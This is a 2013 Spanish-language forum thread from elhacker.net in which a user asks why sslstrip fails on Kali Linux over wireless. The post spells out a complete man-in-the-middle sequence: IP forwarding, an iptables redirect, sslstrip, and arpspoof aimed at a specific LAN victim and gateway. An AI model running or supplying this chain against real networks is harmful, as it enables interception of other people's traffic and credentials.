elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Comunicaciones
| |-+  Redes
| | |-+  no me funciona sslstrip
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: no me funciona sslstrip  (Leído 1,351 veces)
daryo


Desconectado Desconectado

Mensajes: 1.071



Ver Perfil WWW
no me funciona sslstrip
« en: 25 Agosto 2013, 19:48 pm »

pues eso estoy usando linux kali es una red wireles y ejecuto
Código:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -l 10000
arpspoof -i wlan0 -t 192.168.0.16 192.168.0.1
no sale ningun error ni nada
cuando dejo el echo en 0 se queda sin internet asi que el arp spoof funciona
se que no funciona porque en el otro computador no cambian los https por http

 :-\
gracias de antemano  :)


En línea

buenas
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
SSLSTRIP « 1 2 3 »
Hacking
BeLGaRioN 20 11,858 Último mensaje 9 Diciembre 2011, 11:33 am
por D_pit_88
SSLstrip 0.9 no funciona...
Hacking
alpha015 8 7,917 Último mensaje 4 Febrero 2013, 17:56 pm
por Bl4ckP0i7
sslstrip
Hacking
pericodelospaloteshack 3 2,540 Último mensaje 1 Junio 2013, 16:21 pm
por kub0x
SSLStrip no funciona correctamente
Hacking
sakun-ice 6 9,966 Último mensaje 25 Junio 2015, 16:32 pm
por Kaxperday
aun funciona SSLStrip
Dudas Generales
RedZer 5 3,091 Último mensaje 30 Octubre 2014, 22:29 pm
por RedZer
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines